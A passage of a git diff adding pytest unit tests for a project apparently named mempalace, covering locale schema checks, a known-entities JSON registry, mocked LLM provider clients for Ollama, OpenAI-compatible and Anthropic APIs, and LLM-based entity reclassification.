+    assert p["dialogue_patterns"], "fr: empty dialogue_patterns"
+    assert p["direct_address_patterns"], "fr: empty direct_address_patterns"
+    assert p["project_verb_patterns"], "fr: empty project_verb_patterns"
+    assert len(p["stopwords"]) > 50, f"fr: stopwords too short ({len(p['stopwords'])})"
+
+
+def test_direct_address_key_is_singular_string_for_all_locales():
+    """Schema invariant: any locale declaring direct-address uses the singular
+    ``direct_address_pattern`` (str), never the plural ``direct_address_patterns`` (list).
+
+    The loader at ``mempalace/i18n/__init__.py:209-210`` only reads the singular key;
+    the plural form is the output schema of the merged dict, not the input schema.
+    Declaring the plural form in a locale file silently drops every direct-address
+    pattern in that locale after load.
+    """
+    from mempalace.i18n import _load_entity_section, available_languages
+
+    for lang in available_languages():
+        section = _load_entity_section(lang)
+        if not section:
+            continue
+        assert "direct_address_patterns" not in section, (
+            f"{lang}: declares plural 'direct_address_patterns' (list); "
+            f"loader only reads singular 'direct_address_pattern' (str). "
+            f"Collapse the list into one `|`-alternation string and rename the key."
+        )
+        if "direct_address_pattern" in section:
+            val = section["direct_address_pattern"]
+            assert isinstance(
+                val, str
+            ), f"{lang}: 'direct_address_pattern' must be str, got {type(val).__name__}"
+            assert val, f"{lang}: 'direct_address_pattern' is empty"
diff --git a/tests/test_known_entities_registry.py b/tests/test_known_entities_registry.py
new file mode 100644
index 000000000..300cfb612
--- /dev/null
+++ b/tests/test_known_entities_registry.py
@@ -0,0 +1,208 @@
+"""Tests for mempalace.miner.add_to_known_entities.
+
+Covers the init → miner wire-up: init's confirmed entities merged into
+``~/.mempalace/known_entities.json`` so the miner's drawer-tagging path
+recognizes them at mine time.
+
+Every test redirects the registry path to a tmp_path to avoid touching
+the real ~/.mempalace/ on the developer's machine.
+"""
+
+import json
+
+import pytest
+
+from mempalace import miner
+
+
+@pytest.fixture
+def temp_registry(tmp_path, monkeypatch):
+    """Redirect the module-level registry path to a tmp file and reset cache."""
+    registry = tmp_path / "known_entities.json"
+    monkeypatch.setattr(miner, "_ENTITY_REGISTRY_PATH", str(registry))
+    miner._ENTITY_REGISTRY_CACHE.update({"mtime": None, "names": frozenset(), "raw": {}})
+    return registry
+
+
+# ── fresh-file cases ────────────────────────────────────────────────────
+
+
+def test_creates_registry_when_absent(temp_registry):
+    assert not temp_registry.exists()
+    miner.add_to_known_entities({"people": ["Alice", "Bob"], "projects": ["foo"]})
+    assert temp_registry.exists()
+    data = json.loads(temp_registry.read_text())
+    assert sorted(data["people"]) == ["Alice", "Bob"]
+    assert data["projects"] == ["foo"]
+
+
+def test_returns_registry_path(temp_registry):
+    result = miner.add_to_known_entities({"people": ["Alice"]})
+    assert result == str(temp_registry)
+
+
+def test_empty_input_still_creates_file(temp_registry):
+    """A no-op merge still touches the file (idempotent), but no entries added."""
+    miner.add_to_known_entities({})
+    # File may or may not be written for a truly empty call — tolerate either.
+    if temp_registry.exists():
+        data = json.loads(temp_registry.read_text())
+        assert data == {} or all(not v for v in data.values())
+
+
+def test_skips_empty_name_strings(temp_registry):
+    miner.add_to_known_entities({"people": ["Alice", "", None]})
+    data = json.loads(temp_registry.read_text())
+    assert data["people"] == ["Alice"]
+
+
+# ── union / dedup cases ────────────────────────────────────────────────
+
+
+def test_unions_with_existing_list_category(temp_registry):
+    temp_registry.write_text(json.dumps({"people": ["Alice", "Bob"]}))
+    miner.add_to_known_entities({"people": ["Bob", "Carol"]})
+    data = json.loads(temp_registry.read_text())
+    # Bob not duplicated, Carol appended, original order preserved
+    assert data["people"] == ["Alice", "Bob", "Carol"]
+
+
+def test_case_insensitive_dedup_preserves_first_seen_variant(temp_registry):
+    temp_registry.write_text(json.dumps({"people": ["Alice"]}))
+    miner.add_to_known_entities({"people": ["alice", "ALICE", "Bob"]})
+    data = json.loads(temp_registry.read_text())
+    # Alice stays as-is; lowercase/uppercase variants don't create new entries
+    assert data["people"] == ["Alice", "Bob"]
+
+
+def test_preserves_untouched_categories(temp_registry):
+    """A category the caller didn't mention must be left alone."""
+    temp_registry.write_text(json.dumps({"people": ["Alice"], "places": ["Paris", "Tokyo"]}))
+    miner.add_to_known_entities({"people": ["Bob"]})
+    data = json.loads(temp_registry.read_text())
+    assert data["places"] == ["Paris", "Tokyo"]
+    assert data["people"] == ["Alice", "Bob"]
+
+
+def test_adds_new_categories(temp_registry):
+    temp_registry.write_text(json.dumps({"people": ["Alice"]}))
+    miner.add_to_known_entities({"projects": ["foo", "bar"]})
+    data = json.loads(temp_registry.read_text())
+    assert data["people"] == ["Alice"]
+    assert data["projects"] == ["foo", "bar"]
+
+
+def test_dedupes_within_input(temp_registry):
+    miner.add_to_known_entities({"people": ["Alice", "alice", "Alice"]})
+    data = json.loads(temp_registry.read_text())
+    assert data["people"] == ["Alice"]
+
+
+# ── dict-format existing registry ──────────────────────────────────────
+
+
+def test_dict_format_existing_category_gets_new_keys(temp_registry):
+    """Miner supports {name: code} dict categories (alternate registry shape).
+    New names are added as keys without overwriting existing codes."""
+    temp_registry.write_text(json.dumps({"people": {"Alice": "ALC", "Bob": "BOB"}}))
+    miner.add_to_known_entities({"people": ["Alice", "Carol"]})
+    data = json.loads(temp_registry.read_text())
+    # Alice's code survives; Carol added with None; Bob untouched
+    assert data["people"]["Alice"] == "ALC"
+    assert data["people"]["Bob"] == "BOB"
+    assert "Carol" in data["people"]
+    assert data["people"]["Carol"] is None
+
+
+def test_dict_format_dedupes_case_insensitively_and_stringifies_new_names(temp_registry):
+    temp_registry.write_text(json.dumps({"people": {"Alice": "ALC"}}))
+    miner.add_to_known_entities({"people": ["alice", 123]})
+    data = json.loads(temp_registry.read_text())
+    assert data["people"] == {"Alice": "ALC", "123": None}
+
+
+# ── error tolerance ───────────────────────────────────────────────────
+
+
+def test_malformed_existing_registry_starts_fresh(temp_registry):
+    temp_registry.write_text("{ not valid json")
+    miner.add_to_known_entities({"people": ["Alice"]})
+    data = json.loads(temp_registry.read_text())
+    assert data == {"people": ["Alice"]}
+
+
+def test_non_dict_existing_registry_starts_fresh(temp_registry):
+    temp_registry.write_text(json.dumps(["unexpected", "array"]))
+    miner.add_to_known_entities({"people": ["Alice"]})
+    data = json.loads(temp_registry.read_text())
+    assert data == {"people": ["Alice"]}
+
+
+def test_non_list_input_category_ignored(temp_registry):
+    miner.add_to_known_entities({"people": ["Alice"], "weird": "not a list"})
+    data = json.loads(temp_registry.read_text())
+    assert "weird" not in data or data.get("weird") == "not a list"
+    assert data["people"] == ["Alice"]
+
+
+# ── cache invalidation ───────────────────────────────────────────────
+
+
+def test_cache_invalidated_so_subsequent_load_sees_write(temp_registry):
+    """cmd_init → cmd_mine runs in the same process; the load path must
+    see what init just wrote without a process restart."""
+    # Prime the cache with an empty state
+    miner._load_known_entities()
+    assert miner._load_known_entities() == frozenset()
+
+    miner.add_to_known_entities({"people": ["Alice", "Bob"], "projects": ["foo"]})
+
+    loaded = miner._load_known_entities()
+    assert "Alice" in loaded
+    assert "Bob" in loaded
+    assert "foo" in loaded
+
+
+def test_raw_view_reflects_write(temp_registry):
+    miner.add_to_known_entities({"people": ["Alice"]})
+    raw = miner._load_known_entities_raw()
+    assert raw.get("people") == ["Alice"]
+
+
+# ── Unicode round-trip ────────────────────────────────────────────────
+
+
+def test_unicode_names_written_literally_not_escaped(temp_registry):
+    """`ensure_ascii=False` so non-ASCII names stay readable on disk."""
+    miner.add_to_known_entities({"people": ["Gergő Móricz", "Arturo Domínguez"]})
+    raw_text = temp_registry.read_text(encoding="utf-8")
+    assert "Gergő" in raw_text
+    assert "Móricz" in raw_text
+    # Round-trips through JSON
+    data = json.loads(raw_text)
+    assert "Gergő Móricz" in data["people"]
+
+
+# ── end-to-end: does the write actually help _extract_entities_for_metadata? ──
+
+
+def test_populated_registry_improves_miner_recall(temp_registry):
+    """The whole point of the wire-up: names written via add_to_known_entities
+    must be recognized by the miner's entity-extraction metadata pass."""
+    miner.add_to_known_entities(
+        {
+            "people": ["Julia Grib", "Kevin Heifner"],
+            "projects": ["hyperion-history", "mempalace"],
+        }
+    )
+
+    sample = (
+        "Met with Julia Grib yesterday about the mempalace release. "
+        "Kevin Heifner pushed the hyperion-history fix."
+    )
+    result = miner._extract_entities_for_metadata(sample)
+    tagged = set(result.split(";")) if result else set()
+
+    # All four registered entities should land in the metadata string
+    for expected in ("Julia Grib", "Kevin Heifner", "hyperion-history", "mempalace"):
+        assert expected in tagged, f"expected '{expected}' in metadata {tagged!r}"
diff --git a/tests/test_llm_client.py b/tests/test_llm_client.py
new file mode 100644
index 000000000..184d1000d
--- /dev/null
+++ b/tests/test_llm_client.py
@@ -0,0 +1,327 @@
+"""Tests for mempalace.llm_client.
+
+HTTP is mocked throughout — these tests do not require a running Ollama
+or network access. Live-provider smoke tests live outside the unit-test
+suite.
+"""
+
+import json
+from unittest.mock import patch, MagicMock
+
+import pytest
+
+from mempalace.llm_client import (
+    AnthropicProvider,
+    LLMError,
+    OllamaProvider,
+    OpenAICompatProvider,
+    _http_post_json,
+    get_provider,
+)
+
+
+# ── factory ─────────────────────────────────────────────────────────────
+
+
+def test_get_provider_ollama():
+    p = get_provider("ollama", "gemma4:e4b")
+    assert isinstance(p, OllamaProvider)
+    assert p.model == "gemma4:e4b"
+    assert p.endpoint == OllamaProvider.DEFAULT_ENDPOINT
+
+
+def test_get_provider_openai_compat():
+    p = get_provider("openai-compat", "foo", endpoint="http://localhost:1234")
+    assert isinstance(p, OpenAICompatProvider)
+
+
+def test_get_provider_anthropic():
+    p = get_provider("anthropic", "claude-haiku", api_key="sk-xxx")
+    assert isinstance(p, AnthropicProvider)
+    assert p.api_key == "sk-xxx"
+
+
+def test_get_provider_unknown_raises():
+    with pytest.raises(LLMError, match="Unknown provider"):
+        get_provider("nonsense", "x")
+
+
+# ── _http_post_json ─────────────────────────────────────────────────────
+
+
+def test_http_post_json_success():
+    mock_resp = MagicMock()
+    mock_resp.read.return_value = b'{"ok": true}'
+    mock_resp.__enter__.return_value = mock_resp
+    mock_resp.__exit__.return_value = False
+    with patch("mempalace.llm_client.urlopen", return_value=mock_resp):
+        result = _http_post_json("http://x/y", {"a": 1}, {}, timeout=5)
+    assert result == {"ok": True}
+
+
+def test_http_post_json_http_error_wraps_as_llm_error():
+    from urllib.error import HTTPError
+    import io
+
+    err = HTTPError("http://x", 404, "Not Found", {}, io.BytesIO(b"model missing"))
+    with patch("mempalace.llm_client.urlopen", side_effect=err):
+        with pytest.raises(LLMError, match="HTTP 404"):
+            _http_post_json("http://x", {}, {}, timeout=5)
+
+
+def test_http_post_json_url_error_wraps_as_llm_error():
+    from urllib.error import URLError
+
+    with patch("mempalace.llm_client.urlopen", side_effect=URLError("conn refused")):
+        with pytest.raises(LLMError, match="Cannot reach"):
+            _http_post_json("http://x", {}, {}, timeout=5)
+
+
+def test_http_post_json_malformed_response():
+    mock_resp = MagicMock()
+    mock_resp.read.return_value = b"not json"
+    mock_resp.__enter__.return_value = mock_resp
+    mock_resp.__exit__.return_value = False
+    with patch("mempalace.llm_client.urlopen", return_value=mock_resp):
+        with pytest.raises(LLMError, match="Malformed"):
+            _http_post_json("http://x", {}, {}, timeout=5)
+
+
+# ── OllamaProvider ──────────────────────────────────────────────────────
+
+
+def _mock_ollama_chat_response(content: str):
+    mock = MagicMock()
+    mock.read.return_value = json.dumps({"message": {"content": content}}).encode()
+    mock.__enter__.return_value = mock
+    mock.__exit__.return_value = False
+    return mock
+
+
+def test_ollama_check_available_finds_model():
+    tags = {"models": [{"name": "gemma4:e4b"}, {"name": "other:latest"}]}
+    mock = MagicMock()
+    mock.read.return_value = json.dumps(tags).encode()
+    mock.__enter__.return_value = mock
+    mock.__exit__.return_value = False
+    with patch("mempalace.llm_client.urlopen", return_value=mock):
+        p = OllamaProvider(model="gemma4:e4b")
+        ok, msg = p.check_available()
+    assert ok
+    assert msg == "ok"
+
+
+def test_ollama_check_available_accepts_latest_suffix():
+    tags = {"models": [{"name": "mymodel:latest"}]}
+    mock = MagicMock()
+    mock.read.return_value = json.dumps(tags).encode()
+    mock.__enter__.return_value = mock
+    mock.__exit__.return_value = False
+    with patch("mempalace.llm_client.urlopen", return_value=mock):
+        p = OllamaProvider(model="mymodel")
+        ok, _ = p.check_available()
+    assert ok
+
+
+def test_ollama_check_available_missing_model():
+    tags = {"models": [{"name": "other:latest"}]}
+    mock = MagicMock()
+    mock.read.return_value = json.dumps(tags).encode()
+    mock.__enter__.return_value = mock
+    mock.__exit__.return_value = False
+    with patch("mempalace.llm_client.urlopen", return_value=mock):
+        p = OllamaProvider(model="absent")
+        ok, msg = p.check_available()
+    assert not ok
+    assert "ollama pull absent" in msg
+
+
+def test_ollama_check_available_unreachable():
+    from urllib.error import URLError
+
+    with patch("mempalace.llm_client.urlopen", side_effect=URLError("refused")):
+        p = OllamaProvider(model="gemma4:e4b")
+        ok, msg = p.check_available()
+    assert not ok
+    assert "Cannot reach Ollama" in msg
+
+
+def test_ollama_classify_sends_json_format():
+    captured = {}
+
+    def fake_urlopen(req, *, timeout):
+        captured["url"] = req.full_url
+        captured["body"] = json.loads(req.data.decode())
+        return _mock_ollama_chat_response('{"classifications": []}')
+
+    with patch("mempalace.llm_client.urlopen", side_effect=fake_urlopen):
+        p = OllamaProvider(model="gemma4:e4b")
+        resp = p.classify("sys", "user", json_mode=True)
+
+    assert captured["body"]["format"] == "json"
+    assert captured["body"]["model"] == "gemma4:e4b"
+    assert captured["url"].endswith("/api/chat")
+    assert resp.provider == "ollama"
+    assert resp.text == '{"classifications": []}'
+
+
+def test_ollama_classify_empty_content_raises():
+    with patch("mempalace.llm_client.urlopen", return_value=_mock_ollama_chat_response("")):
+        p = OllamaProvider(model="x")
+        with pytest.raises(LLMError, match="Empty response"):
+            p.classify("s", "u")
+
+
+# ── OpenAICompatProvider ────────────────────────────────────────────────
+
+
+def _mock_openai_response(content: str):
+    mock = MagicMock()
+    payload = {"choices": [{"message": {"content": content}}]}
+    mock.read.return_value = json.dumps(payload).encode()
+    mock.__enter__.return_value = mock
+    mock.__exit__.return_value = False
+    return mock
+
+
+def test_openai_compat_resolves_url_with_v1_suffix():
+    captured = {}
+
+    def fake_urlopen(req, *, timeout):
+        captured["url"] = req.full_url
+        return _mock_openai_response('{"ok": true}')
+
+    with patch("mempalace.llm_client.urlopen", side_effect=fake_urlopen):
+        p = OpenAICompatProvider(model="x", endpoint="http://h:1234")
+        p.classify("s", "u")
+    assert captured["url"] == "http://h:1234/v1/chat/completions"
+
+
+def test_openai_compat_resolves_url_with_existing_v1():
+    captured = {}
+
+    def fake_urlopen(req, *, timeout):
+        captured["url"] = req.full_url
+        return _mock_openai_response('{"ok": true}')
+
+    with patch("mempalace.llm_client.urlopen", side_effect=fake_urlopen):
+        p = OpenAICompatProvider(model="x", endpoint="http://h:1234/v1")
+        p.classify("s", "u")
+    assert captured["url"] == "http://h:1234/v1/chat/completions"
+
+
+def test_openai_compat_requires_endpoint():
+    p = OpenAICompatProvider(model="x")
+    with pytest.raises(LLMError, match="requires --llm-endpoint"):
+        p.classify("s", "u")
+
+
+def test_openai_compat_sends_authorization_when_key_present():
+    captured = {}
+
+    def fake_urlopen(req, *, timeout):
+        captured["auth"] = req.get_header("Authorization")
+        return _mock_openai_response('{"ok": true}')
+
+    with patch("mempalace.llm_client.urlopen", side_effect=fake_urlopen):
+        p = OpenAICompatProvider(model="x", endpoint="http://h", api_key="sk-aaa")
+        p.classify("s", "u")
+    assert captured["auth"] == "Bearer sk-aaa"
+
+
+def test_openai_compat_uses_env_var_fallback(monkeypatch):
+    monkeypatch.setenv("OPENAI_API_KEY", "sk-from-env")
+    p = OpenAICompatProvider(model="x", endpoint="http://h")
+    assert p.api_key == "sk-from-env"
+
+
+def test_openai_compat_sends_response_format_json():
+    captured = {}
+
+    def fake_urlopen(req, *, timeout):
+        captured["body"] = json.loads(req.data.decode())
+        return _mock_openai_response('{"ok": true}')
+
+    with patch("mempalace.llm_client.urlopen", side_effect=fake_urlopen):
+        p = OpenAICompatProvider(model="x", endpoint="http://h")
+        p.classify("s", "u", json_mode=True)
+    assert captured["body"]["response_format"] == {"type": "json_object"}
+
+
+def test_openai_compat_unexpected_shape_raises():
+    mock = MagicMock()
+    mock.read.return_value = b'{"nothing": "here"}'
+    mock.__enter__.return_value = mock
+    mock.__exit__.return_value = False
+    with patch("mempalace.llm_client.urlopen", return_value=mock):
+        p = OpenAICompatProvider(model="x", endpoint="http://h")
+        with pytest.raises(LLMError, match="Unexpected response shape"):
+            p.classify("s", "u")
+
+
+# ── AnthropicProvider ───────────────────────────────────────────────────
+
+
+def _mock_anthropic_response(text: str):
+    mock = MagicMock()
+    payload = {"content": [{"type": "text", "text": text}]}
+    mock.read.return_value = json.dumps(payload).encode()
+    mock.__enter__.return_value = mock
+    mock.__exit__.return_value = False
+    return mock
+
+
+def test_anthropic_requires_api_key(monkeypatch):
+    monkeypatch.delenv("ANTHROPIC_API_KEY", raising=False)
+    p = AnthropicProvider(model="claude-haiku")
+    ok, msg = p.check_available()
+    assert not ok
+    assert "ANTHROPIC_API_KEY" in msg
+
+
+def test_anthropic_reads_env_key(monkeypatch):
+    monkeypatch.setenv("ANTHROPIC_API_KEY", "sk-ant-env")
+    p = AnthropicProvider(model="claude-haiku")
+    assert p.api_key == "sk-ant-env"
+    ok, _ = p.check_available()
+    assert ok
+
+
+def test_anthropic_classify_sends_version_and_key():
+    captured = {}
+
+    def fake_urlopen(req, *, timeout):
+        captured["api_key"] = req.get_header("X-api-key")
+        captured["version"] = req.get_header("Anthropic-version")
+        return _mock_anthropic_response('{"ok": true}')
+
+    with patch("mempalace.llm_client.urlopen", side_effect=fake_urlopen):
+        p = AnthropicProvider(model="claude-haiku", api_key="sk-ant-abc")
+        resp = p.classify("s", "u")
+    assert captured["api_key"] == "sk-ant-abc"
+    assert captured["version"] == AnthropicProvider.API_VERSION
+    assert resp.text == '{"ok": true}'
+
+
+def test_anthropic_joins_multiple_text_blocks():
+    mock = MagicMock()
+    payload = {
+        "content": [
+            {"type": "text", "text": "part one. "},
+            {"type": "text", "text": "part two."},
+        ]
+    }
+    mock.read.return_value = json.dumps(payload).encode()
+    mock.__enter__.return_value = mock
+    mock.__exit__.return_value = False
+    with patch("mempalace.llm_client.urlopen", return_value=mock):
+        p = AnthropicProvider(model="claude-haiku", api_key="sk-ant")
+        resp = p.classify("s", "u")
+    assert resp.text == "part one. part two."
+
+
+def test_anthropic_no_key_raises_on_classify(monkeypatch):
+    monkeypatch.delenv("ANTHROPIC_API_KEY", raising=False)
+    p = AnthropicProvider(model="claude-haiku")
+    with pytest.raises(LLMError, match="requires ANTHROPIC_API_KEY"):
+        p.classify("s", "u")
diff --git a/tests/test_llm_refine.py b/tests/test_llm_refine.py
new file mode 100644
index 000000000..b3e7d2d2f
--- /dev/null
+++ b/tests/test_llm_refine.py
@@ -0,0 +1,631 @@
+"""Tests for mempalace.llm_refine.
+
+Uses a fake provider for deterministic, offline tests. No network.
+"""
+
+from dataclasses import dataclass
+
+
+from mempalace.llm_client import LLMError, LLMResponse
+from mempalace.llm_refine import (
+    _apply_classifications,
+    _build_user_prompt,
+    _collect_contexts,
+    _extract_json_candidates,
+    _is_authoritative_person,
+    _is_authoritative_project,
+    _parse_response,
+    collect_corpus_text,
+    refine_entities,
+)
+
+
+# ── fake provider ───────────────────────────────────────────────────────
+
+
+@dataclass
+class FakeProvider:
+    """Returns a caller-supplied JSON string on every classify call."""
+
+    response_text: str = ""
+    should_raise: Exception = None
+    call_count: int = 0
+    interrupt_on_call: int = -1
+
+    def classify(self, system, user, json_mode=True):
+        self.call_count += 1
+        if self.call_count == self.interrupt_on_call:
+            raise KeyboardInterrupt()
+        if self.should_raise is not None:
+            raise self.should_raise
+        return LLMResponse(text=self.response_text, model="fake", provider="fake", raw={})
+
+    def check_available(self):
+        return True, "ok"
+
+
+# ── _collect_contexts ───────────────────────────────────────────────────
+
+
+def test_collect_contexts_finds_matches():
+    lines = [
+        "Something about Alice",
+        "Bob said hello",
+        "Alice was here",
+        "Alice walked by",
+    ]
+    out = _collect_contexts(lines, "Alice", max_lines=2)
+    assert len(out) == 2
+    assert all("alice" in line.lower() for line in out)
+
+
+def test_collect_contexts_case_insensitive():
+    lines = ["lowercase alice mention"]
+    out = _collect_contexts(lines, "Alice")
+    assert out == ["lowercase alice mention"]
+
+
+def test_collect_contexts_uses_token_boundaries():
+    lines = [
+        "forgot should not match",
+        "Go is a language.",
+        "go-v1 shipped.",
+    ]
+    out = _collect_contexts(lines, "Go", max_lines=5)
+    assert out == ["Go is a language.", "go-v1 shipped."]
+
+
+def test_collect_contexts_dedupes_identical_lines():
+    lines = ["Alice", "Alice", "Alice was here"]
+    out = _collect_contexts(lines, "Alice", max_lines=5)
+    # two unique lines, not three
+    assert len(out) == 2
+
+
+def test_collect_contexts_truncates_long_lines():
+    lines = ["Alice " + ("x" * 1000)]
+    out = _collect_contexts(lines, "Alice")
+    assert len(out[0]) <= 240
+
+
+def test_collect_contexts_no_matches():
+    assert _collect_contexts(["nothing here"], "Alice") == []
+
+
+# ── _build_user_prompt ──────────────────────────────────────────────────
+
+
+def test_build_user_prompt_numbers_and_includes_contexts():
+    prompt = _build_user_prompt(
+        [
+            ("Alice", "uncertain", ["Alice said hi"]),
+            ("Bob", "project", []),
+        ]
+    )
+    assert "1. Alice" in prompt
+    assert "2. Bob" in prompt
+    assert "Alice said hi" in prompt
+    assert "(no context available)" in prompt
+
+
+# ── _parse_response ─────────────────────────────────────────────────────
+
+
+def test_parse_response_canonicalizes_label():
+    text = '{"classifications": [{"name": "Alice", "label": "person", "reason": "x"}]}'
+    out = _parse_response(text, ["Alice"])
+    assert out["Alice"] == ("PERSON", "x")
+
+
+def test_parse_response_accepts_type_alias():
+    """LLMs may return 'type' instead of 'label'."""
+    text = '{"classifications": [{"name": "Bob", "type": "PROJECT"}]}'
+    out = _parse_response(text, ["Bob"])
+    assert out["Bob"][0] == "PROJECT"
+
+
+def test_parse_response_maps_unknown_label_to_ambiguous():
+    text = '{"classifications": [{"name": "X", "label": "WEIRD"}]}'
+    out = _parse_response(text, ["X"])
+    assert out["X"][0] == "AMBIGUOUS"
+
+
+def test_parse_response_restores_canonical_casing():
+    """Model may lowercase the name; we restore against the expected set."""
+    text = '{"classifications": [{"name": "mempalace", "label": "PROJECT"}]}'
+    out = _parse_response(text, ["MemPalace"])
+    assert "MemPalace" in out
+    assert out["MemPalace"][0] == "PROJECT"
+
+
+def test_parse_response_strips_code_fences():
+    text = '```json\n{"classifications": [{"name": "X", "label": "TOPIC"}]}\n```'
+    out = _parse_response(text, ["X"])
+    assert out["X"][0] == "TOPIC"
+
+
+def test_parse_response_extracts_json_after_prose():
+    text = 'Sure, here is the JSON: {"classifications": [{"name": "X", "label": "TOPIC"}]}'
+    out = _parse_response(text, ["X"])
+    assert out["X"][0] == "TOPIC"
+
+
+def test_parse_response_extracts_fenced_json_after_prose():
+    text = 'Sure:\n```json\n{"classifications": [{"name": "X", "label": "PROJECT"}]}\n```'
+    out = _parse_response(text, ["X"])
+    assert out["X"][0] == "PROJECT"
+
+
+def test_extract_json_candidates_handles_embedded_array():
+    text = 'prefix [{"name": "Y", "label": "PERSON"}] suffix'
+    candidates = _extract_json_candidates(text)
+    assert '[{"name": "Y", "label": "PERSON"}]' in candidates
+
+
+def test_parse_response_ignores_non_json_brackets_before_payload():
+    text = 'See [note] first. JSON: {"classifications": [{"name": "X", "label": "TOPIC"}]}'
+    out = _parse_response(text, ["X"])
+    assert out["X"][0] == "TOPIC"
+
+
+def test_parse_response_malformed_returns_empty():
+    out = _parse_response("not json at all", ["X"])
+    assert out == {}
+
+
+def test_parse_response_accepts_top_level_list():
+    """Some models skip the wrapping object and return the list directly."""
+    text = '[{"name": "Y", "label": "PERSON"}]'
+    out = _parse_response(text, ["Y"])
+    assert out["Y"][0] == "PERSON"
+
+
+# ── _apply_classifications ──────────────────────────────────────────────
+
+
+def test_apply_classifications_moves_to_correct_bucket():
+    detected = {
+        "people": [],
+        "projects": [
+            {
+                "name": "Foo",
+                "type": "project",
+                "confidence": 0.8,
+                "frequency": 3,
+                "signals": ["old"],
+            }
+        ],
+        "uncertain": [
+            {"name": "Alice", "type": "uncertain", "confidence": 0.4, "frequency": 5, "signals": []}
+        ],
+    }
+    decisions = {
+        "Foo": ("PROJECT", "real project name"),
+        "Alice": ("PERSON", "clearly a person"),
+    }
+    new, reclass, dropped = _apply_classifications(detected, decisions)
+    assert len(new["people"]) == 1
+    assert new["people"][0]["name"] == "Alice"
+    assert new["people"][0]["type"] == "person"
+    assert reclass == 1  # Alice moved uncertain -> people
+    assert dropped == 0
+
+
+def test_apply_classifications_drops_common_word():
+    detected = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {
+                "name": "Never",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 20,
+                "signals": [],
+            }
+        ],
+    }
+    decisions = {"Never": ("COMMON_WORD", "adverb")}
+    new, _, dropped = _apply_classifications(detected, decisions)
+    assert dropped == 1
+    assert new["uncertain"] == []
+
+
+def test_apply_classifications_keeps_unvisited_entries():
+    detected = {
+        "people": [
+            {
+                "name": "Igor",
+                "type": "person",
+                "confidence": 0.99,
+                "frequency": 100,
+                "signals": ["git"],
+            }
+        ],
+        "projects": [],
+        "uncertain": [],
+    }
+    # No decision for Igor — should stay untouched
+    new, reclass, dropped = _apply_classifications(detected, {})
+    assert new["people"][0]["name"] == "Igor"
+    assert reclass == 0
+    assert dropped == 0
+
+
+def test_apply_classifications_appends_reason_signal():
+    detected = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {
+                "name": "Foo",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 5,
+                "signals": ["regex"],
+            }
+        ],
+    }
+    decisions = {"Foo": ("PERSON", "spoken of by name")}
+    new, _, _ = _apply_classifications(detected, decisions)
+    assert any("LLM: person" in s for s in new["people"][0]["signals"])
+    assert any("spoken of by name" in s for s in new["people"][0]["signals"])
+
+
+def test_apply_classifications_topic_goes_to_uncertain():
+    detected = {
+        "people": [],
+        "projects": [
+            {
+                "name": "Paris",
+                "type": "project",
+                "confidence": 0.7,
+                "frequency": 5,
+                "signals": ["regex"],
+            }
+        ],
+        "uncertain": [],
+    }
+    decisions = {"Paris": ("TOPIC", "city, not a project")}
+    new, reclass, _ = _apply_classifications(detected, decisions)
+    assert len(new["projects"]) == 0
+    assert len(new["uncertain"]) == 1
+    assert new["uncertain"][0]["name"] == "Paris"
+    assert reclass == 1
+
+
+def test_apply_classifications_can_block_llm_only_project_promotion():
+    detected = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {
+                "name": "Terraform",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 5,
+                "signals": ["regex"],
+            }
+        ],
+    }
+    decisions = {"Terraform": ("PROJECT", "tool")}
+    new, reclass, _ = _apply_classifications(
+        detected,
+        decisions,
+        allow_project_promotions=False,
+    )
+    assert new["projects"] == []
+    assert new["uncertain"][0]["name"] == "Terraform"
+    assert new["uncertain"][0]["type"] == "uncertain"
+    assert reclass == 0
+
+
+def test_apply_classifications_allows_project_promotion_for_prose_only_mode():
+    detected = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {
+                "name": "Project Aurora",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 5,
+                "signals": ["regex"],
+            }
+        ],
+    }
+    decisions = {"Project Aurora": ("PROJECT", "user effort")}
+    new, reclass, _ = _apply_classifications(detected, decisions)
+    assert new["projects"][0]["name"] == "Project Aurora"
+    assert new["projects"][0]["type"] == "project"
+    assert reclass == 1
+
+
+# ── authoritative source filters ────────────────────────────────────────
+
+
+def test_is_authoritative_person_requires_git_signal():
+    assert _is_authoritative_person({"signals": ["5 commits across 2 repos"]})
+    assert not _is_authoritative_person({"signals": ["pronoun nearby (5x)"]})
+
+
+def test_is_authoritative_project_requires_manifest_or_git_signal():
+    assert _is_authoritative_project({"signals": ["package.json, 12 of your commits"]})
+    assert _is_authoritative_project({"signals": ["57 commits (none by you)"]})
+    assert not _is_authoritative_project({"signals": ["code file reference (5x)"]})
+
+
+# ── refine_entities ─────────────────────────────────────────────────────
+
+
+def _sample_detected():
+    return {
+        "people": [
+            {
+                "name": "Igor",
+                "type": "person",
+                "confidence": 0.99,
+                "frequency": 100,
+                "signals": ["git"],
+            }
+        ],
+        "projects": [
+            {
+                "name": "Foo",
+                "type": "project",
+                "confidence": 0.7,
+                "frequency": 5,
+                "signals": ["regex"],
+            }
+        ],
+        "uncertain": [
+            {
+                "name": "Never",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 10,
+                "signals": [],
+            },
+            {
+                "name": "Alice",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 5,
+                "signals": [],
+            },
+        ],
+    }
+
+
+def test_refine_entities_end_to_end_with_fake_provider():
+    provider = FakeProvider(
+        response_text=(
+            '{"classifications": ['
+            '{"name": "Foo", "label": "PROJECT", "reason": "real"},'
+            '{"name": "Never", "label": "COMMON_WORD"},'
+            '{"name": "Alice", "label": "PERSON", "reason": "name"}'
+            "]}"
+        )
+    )
+    result = refine_entities(
+        _sample_detected(),
+        corpus_text="Alice said hi. Foo was shipped. Never gonna.",
+        provider=provider,
+        show_progress=False,
+    )
+    assert result.batches_total == 1
+    assert result.batches_completed == 1
+    assert not result.cancelled
+    # Alice → people, Never → dropped, Foo stays in projects
+    names_in_people = [e["name"] for e in result.merged["people"]]
+    assert "Alice" in names_in_people
+    assert "Igor" in names_in_people  # untouched
+    assert "Never" not in [e["name"] for e in result.merged["uncertain"]]
+    assert result.dropped == 1
+
+
+def test_refine_entities_skips_high_confidence_projects():
